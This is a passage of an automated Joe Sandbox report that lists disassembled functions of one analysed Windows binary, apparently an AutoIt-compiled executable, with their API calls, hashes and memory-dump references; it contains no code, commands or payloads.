Associated: 00000000.00000002.1481838791.0000000000ABE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481910281.0000000000ACA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481958838.0000000000AD4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_bIcqeSVPW6.jbxd

Similarity

API ID: ErrorLast$_strlenselect
String ID:
API String ID: 2217125717-0
Opcode ID: 6004e8bb6260db1eced7029dc6b10de8f92ddf550879723fc0558c8f3ae40a79
Instruction ID: 353111f7b8f6541810978bcfe7d2e2febf7d9cea246c34711c426676ac96b179
Opcode Fuzzy Hash: 6004e8bb6260db1eced7029dc6b10de8f92ddf550879723fc0558c8f3ae40a79
Instruction Fuzzy Hash: BE418F71600204AFCB14EBA4CE85EEEB7BDAF58314F104669F516A72D1DF34AE44CB60

Function 00A2ABF5 Relevance: 9.1, APIs: 6, Instructions: 113COMMON

Download Yara Rule

APIs

Part of subcall function 00A2B34E: GetWindowLongW.USER32(?,000000EB), ref: 00A2B35F

BeginPaint.USER32(?,?,?), ref: 00A2AC2A
GetWindowRect.USER32(?,?), ref: 00A2AC8E
ScreenToClient.USER32(?,?), ref: 00A2ACAB
SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00A2ACBC
EndPaint.USER32(?,?,?,?,?), ref: 00A2AD06
Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 00A8E673

Memory Dump Source

Source File: 00000000.00000002.1481754944.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1481724647.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000A9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000ABE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481910281.0000000000ACA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481958838.0000000000AD4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_bIcqeSVPW6.jbxd

Similarity

API ID: PaintWindow$BeginClientLongRectRectangleScreenViewport
String ID:
API String ID: 2592858361-0
Opcode ID: e8bd5bcf4a8ff364a27bd75d82d86d63995e245ff94f1951e39d0a067efdc14d
Instruction ID: f7efcebc20f704bd68caaaf3d89dbebed3b69606388cd7a0adbb69b55fa87e7b
Opcode Fuzzy Hash: e8bd5bcf4a8ff364a27bd75d82d86d63995e245ff94f1951e39d0a067efdc14d
Instruction Fuzzy Hash: 9341B371205310AFC710DFA8EC84F767BF8FB65324F14066AFAA5872A1D7319845DB62

Function 00A7E397 Relevance: 9.1, APIs: 6, Instructions: 108windowCOMMON

Download Yara Rule

APIs

ShowWindow.USER32(00AD1628,00000000,00AD1628,00000000,00000000,00AD1628,?,00A8DC5D,00000000,?,00000000,00000000,00000000,?,00A8DAD1,00000004), ref: 00A7E40B
EnableWindow.USER32(00000000,00000000), ref: 00A7E42F
ShowWindow.USER32(00AD1628,00000000), ref: 00A7E48F
ShowWindow.USER32(00000000,00000004), ref: 00A7E4A1
EnableWindow.USER32(00000000,00000001), ref: 00A7E4C5
SendMessageW.USER32(?,0000130C,00000000,00000000), ref: 00A7E4E8

Memory Dump Source

Source File: 00000000.00000002.1481754944.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1481724647.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000A9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000ABE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481910281.0000000000ACA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481958838.0000000000AD4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_bIcqeSVPW6.jbxd

Similarity

API ID: Window$Show$Enable$MessageSend
String ID:
API String ID: 642888154-0
Opcode ID: 0689b9d558df23f596c88aef9b23222ff60a5fc0f91037bceefd5c0fb13b7b42
Instruction ID: 2604b2dbdfaff182b81449279d163f9cfb9aa6b2461cb63439921a2bf0b5b333
Opcode Fuzzy Hash: 0689b9d558df23f596c88aef9b23222ff60a5fc0f91037bceefd5c0fb13b7b42
Instruction Fuzzy Hash: 41416D31601140EFDB22CF68C999B947BE1BF09304F18C1E9EA5D9F2A2C732A842CB51

Function 00A598BA Relevance: 9.1, APIs: 6, Instructions: 100fileCOMMON

Download Yara Rule

APIs

InterlockedExchange.KERNEL32(?,000001F5), ref: 00A598D1

Part of subcall function 00A2F4EA: std::exception::exception.LIBCMT ref: 00A2F51E
Part of subcall function 00A2F4EA: __CxxThrowException@8.LIBCMT ref: 00A2F533

ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 00A59908
EnterCriticalSection.KERNEL32(?), ref: 00A59924
LeaveCriticalSection.KERNEL32(?), ref: 00A5999E
ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 00A599B3
InterlockedExchange.KERNEL32(?,000001F6), ref: 00A599D2

Memory Dump Source

Source File: 00000000.00000002.1481754944.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1481724647.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000A9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000ABE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481910281.0000000000ACA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481958838.0000000000AD4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_bIcqeSVPW6.jbxd

Similarity

API ID: CriticalExchangeFileInterlockedReadSection$EnterException@8LeaveThrowstd::exception::exception
String ID:
API String ID: 2537439066-0
Opcode ID: 3b6c24caba459187fb5f43680a6d83f20dddf7b3ea0b6ae944a685f368e7a939
Instruction ID: 36968d63e5e1797bf931b398b732bb70c51d2e1549d49a213ccd83f98b0ec9c0
Opcode Fuzzy Hash: 3b6c24caba459187fb5f43680a6d83f20dddf7b3ea0b6ae944a685f368e7a939
Instruction Fuzzy Hash: 2D317031A00115EFDB00EFA9DD85EABB778FF44310B1480BAE904AB256DB70DA55DBA0

Function 00A69B45 Relevance: 9.1, APIs: 6, Instructions: 99COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32(?,?,?,?,?,?,00A677F4,?,?,00000000,00000001), ref: 00A69B53

Part of subcall function 00A66544: GetWindowRect.USER32(?,?), ref: 00A66557

GetDesktopWindow.USER32 ref: 00A69B7D
GetWindowRect.USER32(00000000), ref: 00A69B84
mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 00A69BB6

Part of subcall function 00A57A58: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00A57AD0

GetCursorPos.USER32(?), ref: 00A69BE2
mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00A69C44

Memory Dump Source

Source File: 00000000.00000002.1481754944.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1481724647.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000A9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000ABE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481910281.0000000000ACA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481958838.0000000000AD4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_bIcqeSVPW6.jbxd

Similarity

API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
String ID:
API String ID: 4137160315-0
Opcode ID: aeb730530bdaab05b1813ff23768288deaba5ffb12d8c24ed559d92617ee8293
Instruction ID: 708e25e227c4ffe9175fa5ab923e62cb5ef45b2d7c757b075a7d352bda633831
Opcode Fuzzy Hash: aeb730530bdaab05b1813ff23768288deaba5ffb12d8c24ed559d92617ee8293
Instruction Fuzzy Hash: 2A31CF72204305ABC710DF54D849F9BB7EDFF88314F00091AF689E7181DA31EA49CB92

Function 00A4AF64 Relevance: 9.1, APIs: 6, Instructions: 73processCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 00A4AFAE
OpenProcessToken.ADVAPI32(00000000), ref: 00A4AFB5
CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 00A4AFC4
CloseHandle.KERNEL32(00000004), ref: 00A4AFCF
CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00A4AFFE
DestroyEnvironmentBlock.USERENV(00000000), ref: 00A4B012

Memory Dump Source

Source File: 00000000.00000002.1481754944.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1481724647.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000A9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000ABE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481910281.0000000000ACA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481958838.0000000000AD4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_bIcqeSVPW6.jbxd

Similarity

API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
String ID:
API String ID: 1413079979-0
Opcode ID: 7fc9a876c8203077014eb0d448d467b4669399728ca2240b8c1d1aee198f9f6f
Instruction ID: 00655b2ba4801bd1f14f06fb58c30b6770e4091e71b5535d51703638ccf7dd2b
Opcode Fuzzy Hash: 7fc9a876c8203077014eb0d448d467b4669399728ca2240b8c1d1aee198f9f6f
Instruction Fuzzy Hash: 9A218E76140209AFCF02CFE8ED09FAE7BA9EF84304F044015FA02A6161C776DD65EB61

Function 00A7EBF6 Relevance: 9.0, APIs: 6, Instructions: 49COMMON

Download Yara Rule

APIs

Part of subcall function 00A2AF83: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 00A2AFE3
Part of subcall function 00A2AF83: SelectObject.GDI32(?,00000000), ref: 00A2AFF2
Part of subcall function 00A2AF83: BeginPath.GDI32(?), ref: 00A2B009
Part of subcall function 00A2AF83: SelectObject.GDI32(?,00000000), ref: 00A2B033

MoveToEx.GDI32(00000000,-00000002,?,00000000), ref: 00A7EC20
LineTo.GDI32(00000000,00000003,?), ref: 00A7EC34
MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 00A7EC42
LineTo.GDI32(00000000,00000000,?), ref: 00A7EC52
EndPath.GDI32(00000000), ref: 00A7EC62
StrokePath.GDI32(00000000), ref: 00A7EC72

Memory Dump Source

Source File: 00000000.00000002.1481754944.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1481724647.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000A9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000ABE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481910281.0000000000ACA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481958838.0000000000AD4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_bIcqeSVPW6.jbxd

Similarity

API ID: Path$LineMoveObjectSelect$BeginCreateStroke
String ID:
API String ID: 43455801-0
Opcode ID: 0bbf1b55ba11ebd674154aed54d80f7f547dca206e3aad7f59a7eadc3eb5979b
Instruction ID: 49b3d7e06cd39f131b5d7f01bf3a0ed9cd341c9b2ab790f7f222a036e027c522
Opcode Fuzzy Hash: 0bbf1b55ba11ebd674154aed54d80f7f547dca206e3aad7f59a7eadc3eb5979b
Instruction Fuzzy Hash: 5111577610015CBFEF02DF94DD88EEA7F6DEB08350F048122BE098A160CB719D96DBA0

Function 00A4E19B Relevance: 9.0, APIs: 6, Instructions: 48COMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 00A4E1C0
GetDeviceCaps.GDI32(00000000,00000058), ref: 00A4E1D1
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00A4E1D8
ReleaseDC.USER32(00000000,00000000), ref: 00A4E1E0
MulDiv.KERNEL32(000009EC,?,00000000), ref: 00A4E1F7
MulDiv.KERNEL32(000009EC,?,?), ref: 00A4E209

Part of subcall function 00A49AA3: RaiseException.KERNEL32(-C0000018,00000001,00000000,00000000,00A49A05,00000000,00000000,?,00A49DDB), ref: 00A4A53A

Memory Dump Source

Source File: 00000000.00000002.1481754944.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1481724647.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000A9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000ABE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481910281.0000000000ACA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481958838.0000000000AD4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_bIcqeSVPW6.jbxd

Similarity

API ID: CapsDevice$ExceptionRaiseRelease
String ID:
API String ID: 603618608-0
Opcode ID: ed5b6a43683229ea476ff5c7b83bd7ee69c6f94814f06f6ab682523038df14f6
Instruction ID: f491aee5b0235923dc82bed3ff985114138f9a4c6e35a3cebcd1ed9d49e4f05f
Opcode Fuzzy Hash: ed5b6a43683229ea476ff5c7b83bd7ee69c6f94814f06f6ab682523038df14f6
Instruction Fuzzy Hash: 89018FB5B40314BFEB109BE68C45B5EBFB8EB88351F004066EA08A7290DA709C01CBA0

Function 00A37B47 Relevance: 9.0, APIs: 6, Instructions: 45threadCOMMON

Download Yara Rule

APIs

__init_pointers.LIBCMT ref: 00A37B47

Part of subcall function 00A3123A: __initp_misc_winsig.LIBCMT ref: 00A3125E
Part of subcall function 00A3123A: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 00A37F51
Part of subcall function 00A3123A: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00A37F65
Part of subcall function 00A3123A: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00A37F78
Part of subcall function 00A3123A: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00A37F8B
Part of subcall function 00A3123A: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00A37F9E
Part of subcall function 00A3123A: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 00A37FB1
Part of subcall function 00A3123A: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 00A37FC4
Part of subcall function 00A3123A: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 00A37FD7
Part of subcall function 00A3123A: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 00A37FEA
Part of subcall function 00A3123A: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 00A37FFD
Part of subcall function 00A3123A: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 00A38010
Part of subcall function 00A3123A: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 00A38023
Part of subcall function 00A3123A: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 00A38036
Part of subcall function 00A3123A: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 00A38049
Part of subcall function 00A3123A: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 00A3805C
Part of subcall function 00A3123A: GetProcAddress.KERNEL32(00000000,FlushProcessWriteBuffers), ref: 00A3806F

__mtinitlocks.LIBCMT ref: 00A37B4C

Part of subcall function 00A37E23: InitializeCriticalSectionAndSpinCount.KERNEL32(00ACAC68,00000FA0,?,?,00A37B51,00A35E77,00AC6C70,00000014), ref: 00A37E41

__mtterm.LIBCMT ref: 00A37B55

Part of subcall function 00A37BBD: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,00A37B5A,00A35E77,00AC6C70,00000014), ref: 00A37D3F
Part of subcall function 00A37BBD: _free.LIBCMT ref: 00A37D46
Part of subcall function 00A37BBD: DeleteCriticalSection.KERNEL32(00ACAC68,?,?,00A37B5A,00A35E77,00AC6C70,00000014), ref: 00A37D68

__calloc_crt.LIBCMT ref: 00A37B7A
GetCurrentThreadId.KERNEL32 ref: 00A37BA3

Memory Dump Source

Source File: 00000000.00000002.1481754944.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1481724647.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000A9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000ABE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481910281.0000000000ACA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481958838.0000000000AD4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_bIcqeSVPW6.jbxd

Similarity

API ID: AddressProc$CriticalSection$Delete$CountCurrentHandleInitializeModuleSpinThread__calloc_crt__init_pointers__initp_misc_winsig__mtinitlocks__mtterm_free
String ID:
API String ID: 2942034483-0
Opcode ID: 1b77cee2c7bb4be2a621f599f01daa112720fcfe649f2705fa6b2ae1e5297086
Instruction ID: d5a617bff05c8c0a6178c5d35ca07f57c3b5fc5e337272bbd3cff03eed4104aa
Opcode Fuzzy Hash: 1b77cee2c7bb4be2a621f599f01daa112720fcfe649f2705fa6b2ae1e5297086
Instruction Fuzzy Hash: DDF0B4B250D3161BE635BFB47E07A5F66E49F02774F310AA9F861E50D2FF2088428164

Function 00A127EC Relevance: 9.0, APIs: 6, Instructions: 44keyboardCOMMON

Download Yara Rule

APIs

MapVirtualKeyW.USER32(0000005B,00000000), ref: 00A1281D
MapVirtualKeyW.USER32(00000010,00000000), ref: 00A12825
MapVirtualKeyW.USER32(000000A0,00000000), ref: 00A12830
MapVirtualKeyW.USER32(000000A1,00000000), ref: 00A1283B
MapVirtualKeyW.USER32(00000011,00000000), ref: 00A12843
MapVirtualKeyW.USER32(00000012,00000000), ref: 00A1284B

Memory Dump Source

Source File: 00000000.00000002.1481754944.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1481724647.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000A9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000ABE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481910281.0000000000ACA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481958838.0000000000AD4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_bIcqeSVPW6.jbxd

Similarity

API ID: Virtual
String ID:
API String ID: 4278518827-0
Opcode ID: b730d4669e0a75a19dd0b6d2a22f31e9d39a28eb85d09bb38901f845c2cd53f0
Instruction ID: 5cf8fa981a42bfaf15a512d3d4c2cc92450e59a53cb6b123dee6a9eafe19844a
Opcode Fuzzy Hash: b730d4669e0a75a19dd0b6d2a22f31e9d39a28eb85d09bb38901f845c2cd53f0
Instruction Fuzzy Hash: EB0167B1A02B5ABDE3008F6A8C85B56FFA8FF19354F00411BA15C47A42C7F5A864CBE5

Function 00A59AD5 Relevance: 9.0, APIs: 6, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1481754944.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1481724647.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000A9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000ABE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481910281.0000000000ACA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481958838.0000000000AD4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_bIcqeSVPW6.jbxd

Similarity

API ID: CriticalExchangeInterlockedSection$EnterLeaveObjectSingleTerminateThreadWait
String ID:
API String ID: 1423608774-0
Opcode ID: c78bf73f97842bcd48d07823ccea44db0bf12b0c4545f72dbf0506ae6d7b5e13
Instruction ID: c84fe547c1af2c9d7c1df6ee52258a95993928adc5d5e59d4a3ca3b8756c6887
Opcode Fuzzy Hash: c78bf73f97842bcd48d07823ccea44db0bf12b0c4545f72dbf0506ae6d7b5e13
Instruction Fuzzy Hash: C501A936201211EBDB155B98ED48DEB7769FF88743744042BFA039A090DF749847DB60

Function 00A57BF7 Relevance: 9.0, APIs: 6, Instructions: 42windowtimethreadCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,00000000), ref: 00A57C07
SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 00A57C1D
GetWindowThreadProcessId.USER32(?,?), ref: 00A57C2C
OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00A57C3B
TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00A57C45
CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00A57C4C

Memory Dump Source

Source File: 00000000.00000002.1481754944.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1481724647.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000A9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000ABE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481910281.0000000000ACA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481958838.0000000000AD4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_bIcqeSVPW6.jbxd

Similarity

API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
String ID:
API String ID: 839392675-0
Opcode ID: 7482d531834e53bfa8242882b206f4653c7b2019379e721277bfcf9591c62339
Instruction ID: f60afd9465da5c28f13ff05f1aab8b8df8d71f37a0174c625241a28f4d13c45b
Opcode Fuzzy Hash: 7482d531834e53bfa8242882b206f4653c7b2019379e721277bfcf9591c62339
Instruction Fuzzy Hash: CAF03076241158BBE72197929C0DEEF7F7CEFC6B15F00011AFA0191051DBA05A82C6B5

Function 00A59A20 Relevance: 9.0, APIs: 6, Instructions: 33synchronizationthreadCOMMONLIBRARYCODE

Download Yara Rule

APIs

InterlockedExchange.KERNEL32(?,?), ref: 00A59A33
EnterCriticalSection.KERNEL32(?,?,?,?,00A85DEE,?,?,?,?,?,00A1ED63), ref: 00A59A44
TerminateThread.KERNEL32(?,000001F6,?,?,?,00A85DEE,?,?,?,?,?,00A1ED63), ref: 00A59A51
WaitForSingleObject.KERNEL32(?,000003E8,?,?,?,00A85DEE,?,?,?,?,?,00A1ED63), ref: 00A59A5E

Part of subcall function 00A593D1: CloseHandle.KERNEL32(?,?,00A59A6B,?,?,?,00A85DEE,?,?,?,?,?,00A1ED63), ref: 00A593DB

InterlockedExchange.KERNEL32(?,000001F6), ref: 00A59A71
LeaveCriticalSection.KERNEL32(?,?,?,?,00A85DEE,?,?,?,?,?,00A1ED63), ref: 00A59A78

Memory Dump Source

Source File: 00000000.00000002.1481754944.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1481724647.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000A9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000ABE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481910281.0000000000ACA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481958838.0000000000AD4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_bIcqeSVPW6.jbxd

Similarity

API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
String ID:
API String ID: 3495660284-0
Opcode ID: b31acdaa1da464d8b8014c0eddbb4d992539138b90daf3b338c1d3e76eb262b0
Instruction ID: 8dc964a62cac0654a918ab611f776601df32e1bf9d6626b5247fad25027775ec
Opcode Fuzzy Hash: b31acdaa1da464d8b8014c0eddbb4d992539138b90daf3b338c1d3e76eb262b0
Instruction Fuzzy Hash: E5F05E36241211EBD7115BE8ED89DEB7B29FF85302B140426F603990A4DF759846DB60

Function 00A11CDE Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 250COMMON

Download Yara Rule

APIs

Part of subcall function 00A2F4EA: std::exception::exception.LIBCMT ref: 00A2F51E
Part of subcall function 00A2F4EA: __CxxThrowException@8.LIBCMT ref: 00A2F533

__swprintf.LIBCMT ref: 00A11EA6

Strings

\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 00A11D49

Memory Dump Source

Source File: 00000000.00000002.1481754944.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1481724647.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000A9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000ABE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481910281.0000000000ACA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481958838.0000000000AD4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_bIcqeSVPW6.jbxd

Similarity

API ID: Exception@8Throw__swprintfstd::exception::exception
String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
API String ID: 2125237772-557222456
Opcode ID: 1d50cc352c4acd707b0f1a05c1b2a7b7025fbd686cb4d88f7c9418e1322f474d
Instruction ID: c4339fffe10ae90325fb7634be349e5293bab9ee529051d03201702e9b71d857
Opcode Fuzzy Hash: 1d50cc352c4acd707b0f1a05c1b2a7b7025fbd686cb4d88f7c9418e1322f474d
Instruction Fuzzy Hash: 91918D715082119FCB24EF24CA95DAAB7B4FF85710F04492DF996972A1DB30ED84CBA2

Function 00A6AFE0 Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 229COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 00A6B006
CharUpperBuffW.USER32(?,?), ref: 00A6B115
VariantClear.OLEAUT32(?), ref: 00A6B298

Part of subcall function 00A59DC5: VariantInit.OLEAUT32(00000000), ref: 00A59E05
Part of subcall function 00A59DC5: VariantCopy.OLEAUT32(?,?), ref: 00A59E0E
Part of subcall function 00A59DC5: VariantClear.OLEAUT32(?), ref: 00A59E1A

Strings

Incorrect Parameter format, xrefs: 00A6B03E, 00A6B20B
AUTOIT.ERROR, xrefs: 00A6B11B

Memory Dump Source

Source File: 00000000.00000002.1481754944.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1481724647.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000A9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000ABE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481910281.0000000000ACA000.00000004.00000001.01000000.00000003.sdmpDownload File
